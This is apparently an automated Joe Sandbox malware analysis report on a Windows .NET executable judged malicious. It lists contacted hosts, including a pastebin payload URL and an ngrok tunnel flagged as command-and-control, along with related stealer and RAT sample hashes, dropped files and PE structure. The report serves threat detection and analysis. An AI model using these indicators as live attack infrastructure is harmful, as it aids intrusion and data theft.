                    https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                      high
                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                        high
                        https://pastebin.com/raw/s4TipmJtfalse
                          high
                          0.tcp.eu.ngrok.iotrue
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://pastebin.comG1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.20.3.235
                            pastebin.comUnited States
                            13335CLOUDFLARENETUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            3.124.142.205
                            unknownUnited States
                            16509AMAZON-02USfalse
                            18.192.31.165
                            0.tcp.eu.ngrok.ioUnited States
                            16509AMAZON-02UStrue
                            142.251.40.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            IP
                            192.168.2.4
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1435109
                            Start date and time:2024-05-02 06:00:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:22
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:G1lnGpOLK4.exe
                            renamed because original name is a hash value
                            Original Sample Name:97d72efbb1f6fea3f158b136c330689d.exe
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@37/7@13/6
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 23
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.72.99, 142.251.40.206, 172.253.122.84, 34.104.35.123, 72.21.81.240, 192.229.211.108, 142.251.40.99, 142.251.40.174
                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target G1lnGpOLK4.exe, PID 2472 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            06:01:01API Interceptor20x Sleep call for process: powershell.exe modified
                            06:01:46API Interceptor846949x Sleep call for process: G1lnGpOLK4.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.20.3.235[V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                              0ED4nPDjeo.exeGet hashmaliciousRedLine, SectopRATBrowse
                                VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                  Hapril-29-receipt.vbsGet hashmaliciousRemcosBrowse
                                    Hapril-29-receipt.vbsGet hashmaliciousRemcosBrowse
                                      IDM Trial Reset.exeGet hashmaliciousUnknownBrowse
                                        s8veIRIGWR.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                          file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                            file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                              c3nBx2HQG2.exeGet hashmaliciousGlupteba, Mars Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                239.255.255.250https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                  http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                    https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                      Order Request1_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                        202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                          7sYKxZWLgw.exeGet hashmaliciousPureLog StealerBrowse
                                                            Account report (1).docxGet hashmaliciousUnknownBrowse
                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                  Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    3.124.142.205xaa.doc.docxGet hashmaliciousCVE-2021-40444Browse
                                                                    • 259f-88-231-63-13.eu.ngrok.io/
                                                                    18.192.31.165muyq8X8qXp.exeGet hashmaliciousUnknownBrowse
                                                                    • 3eae-79-191-34-149.eu.ngrok.io/sysvndump/send
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    pastebin.com[V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                    • 104.20.3.235
                                                                    0ED4nPDjeo.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                    • 104.20.3.235
                                                                    1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                                    • 104.20.4.235
                                                                    Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                    • 172.67.19.24
                                                                    Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                    • 172.67.19.24
                                                                    prnportccy.vbsGet hashmaliciousFormBookBrowse
                                                                    • 172.67.19.24
                                                                    Demand Q2-2024.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 104.20.3.235
                                                                    Inquiry HA-22-28199 22-077.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 172.67.19.24
                                                                    Hapril-29-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                    • 104.20.3.235
                                                                    Hapril-29-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                    • 104.20.3.235
                                                                    0.tcp.eu.ngrok.io1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                                    • 3.124.142.205
                                                                    MFs7p6ab7w.exeGet hashmaliciousNjratBrowse
                                                                    • 18.192.31.165
                                                                    jpGSWjSTSw.exeGet hashmaliciousNjratBrowse
                                                                    • 3.124.142.205
                                                                    KvS2rT08PQ.exeGet hashmaliciousBlank Grabber, Njrat, Umbral StealerBrowse
                                                                    • 18.158.249.75
                                                                    lLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                                    • 3.125.223.134
                                                                    aXDh3Stgy2.exeGet hashmaliciousNjratBrowse
                                                                    • 18.158.249.75
                                                                    9VnALqFMbF.exeGet hashmaliciousDarkCometBrowse
                                                                    • 3.125.209.94
                                                                    AKsHpy5O2W.exeGet hashmaliciousNjratBrowse
                                                                    • 3.125.223.134
                                                                    D6p5mclMzu.exeGet hashmaliciousNjratBrowse
                                                                    • 3.124.142.205
                                                                    P1Oyl92c7q.exeGet hashmaliciousNjratBrowse
                                                                    • 3.124.142.205
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttps://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.2.184
                                                                    http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                                    • 104.26.9.44
                                                                    https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                                    • 104.16.117.116
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.18.91.62
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.18.89.62
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.18.89.62
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    Signature requested-Fiona QR.pngGet hashmaliciousHTMLPhisherBrowse
                                                                    • 1.1.1.1
                                                                    file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                    • 104.16.185.241
                                                                    NOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 104.26.12.205
                                                                    AMAZON-02UShttps://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                                    • 108.138.106.124
                                                                    http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                                    • 13.225.63.120
                                                                    https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                                    • 108.128.23.94
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.217.132.152
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.214.160.103
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.214.160.103
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.217.103.216
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    AMAZON-02UShttps://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                                    • 108.138.106.124
                                                                    http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                                    • 13.225.63.120
                                                                    https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                                    • 108.128.23.94
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.217.132.152
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.214.160.103
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.214.160.103
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 52.217.103.216
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.21
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    28a2c9bd18a11de089ef85a160da29e4https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    IP #U00c1#U00d6#U00bc#U00d2 #U00ba#U00af#U00b0#U00e6.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    IP #U00c1#U00d6#U00bc#U00d2 #U00ba#U00af#U00b0#U00e6.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    HZkU6Q8hA7.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    https://pub-db1a408105854b1d82b99dbe410de97e.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    https://www.bjvpza.cn/Get hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    https://vpassz.xu4nblog.com/Get hashmaliciousUnknownBrowse
                                                                    • 104.118.8.139
                                                                    • 40.68.123.157
                                                                    54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.20.3.235
                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.20.3.235
                                                                    file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                    • 104.20.3.235
                                                                    Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.20.3.235
                                                                    Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.20.3.235
                                                                    1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                                    • 104.20.3.235
                                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                    • 104.20.3.235
                                                                    https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                                    • 104.20.3.235
                                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                    • 104.20.3.235
                                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.20.3.235
                                                                    No context
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1510207563435464
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3295)
                                                                    Category:downloaded
                                                                    Size (bytes):3300
                                                                    Entropy (8bit):5.866377899275874
                                                                    Encrypted:false
                                                                    SSDEEP:96:PMIBef+li0TZNHcSLVoKoHslPgMd67REaT2WVywa7B9MfQfffo:kMecHNL2KusuRZT/BSB9O
                                                                    MD5:FE93149FE2F21EC362FE4375A67BCAD2
                                                                    SHA1:D4D75C91EF6E97D166C885E5F6D5382A0D580344
                                                                    SHA-256:CFD3AB8EB18109A9F14B29BD474E7F5C239D396980F3E7EDA773C7B0B63C470A
                                                                    SHA-512:ED2E04005CCF82F87E4B1EF58C1B9D85E98EF69211E64920D033B152202E483DE43623EB5DACB91D82BC0C57E89A214B3B7F87225F4DD8F47AA7360B0CD61200
                                                                    Malicious:false
                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                    Preview:)]}'.["",["troy moran hart high school principal","amd stocks","dodgers baseball","today wordle answer","tag heuer formula 1 kith","concert week $25 tickets","google layoffs today","bj west denver broncos"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNG1qbBINQmFzZWJhbGwgdGVhbTLmDWRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRDRBQUFCQUNBTUFBQUIxTnpUSEFBQUFuMUJNVkVYLy8vOEFVcGdBVUpjQVJwTUFQNUFBU1pRQVRaWUFSSklBUVpFQVY1dUpvOFFBT283cjcvVUFTNVVBT0kzMTkvcnhYRi81dzhTYXNNeG5pN2FudXRKS2VLenpmWC96Z1lQOTZ1cjNyN0Q4MzkvNHQ3ais4L1B2UWtiKytmblMyK2ZkNCsxems3dXh3ZGU2eU5zM2JhYjcxZFh3U1UzMW5KMzZ6czd5Ykc3MnA2ajBqcEJiZzdMSDB1SWNZWjk4bXIvc0FBRHVIQ1B3VVZVQU1JcnlkSGJETzVYOUFBQUVOa2xFUVZSSWlhVlhqWHFxT0JBZENBRVNRQlRCVW9yeVc3RVdjTGYxL1o5dEp3blEyNzFWMGM2bkJqRW5Nem5uSkVHQU9YRmNMcGZuMTFsZC80NWt2OGZQOUduekVEcmR3bE1zTHA3Zkg0RnZFb
                                                                    File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                    Entropy (8bit):7.753817895112134
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:G1lnGpOLK4.exe
                                                                    File size:68'951 bytes
                                                                    MD5:97d72efbb1f6fea3f158b136c330689d
                                                                    SHA1:43c884250ed032ced44d72d932518e831a34161d
                                                                    SHA256:2ff91319fbcc02e9dd7d80e21f5f7f48e0ae24b99a1b26625d344ab4812f37c4
                                                                    SHA512:a9937e30d19ebf33ebe4c20792f7499e79996f06b5e3bc6f28d506ba4440640ebc923d424184007f2f111c3706876c029f6d4e41d5ed144c2b8e666b32689596
                                                                    SSDEEP:1536:uuKlhoxbyGiiKkTvTiCUU8b+a1fJ3l4fLU2cjdFZPvf9G95T8KCc4:NKOyGxKIiCV8aa1fJV4zMF54ra
                                                                    TLSH:21630246E7E4D32CC0648F774BC5839B0A28C79453B70F172DF868826D576525AA73E2
                                                                    File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..4..................................................
                                                                    Icon Hash:2dd2d2b3a46c9975
                                                                    Entrypoint:0x402e5e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4D0126CB [Thu Dec 9 18:58:19 2010 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x8c34.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xe640x1000ef0bb17cd9816d583d9451793c5aff3bFalse0.546142578125data5.2499715688397135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x40000x8c340x8e00896e23cf93eff353b5165e05b2caab9cFalse0.9741967429577465data7.911270655840563IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xe0000xc0x2006de33cb53260a7a1670e9af80a458ba5False0.99609375data6.456130237620347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
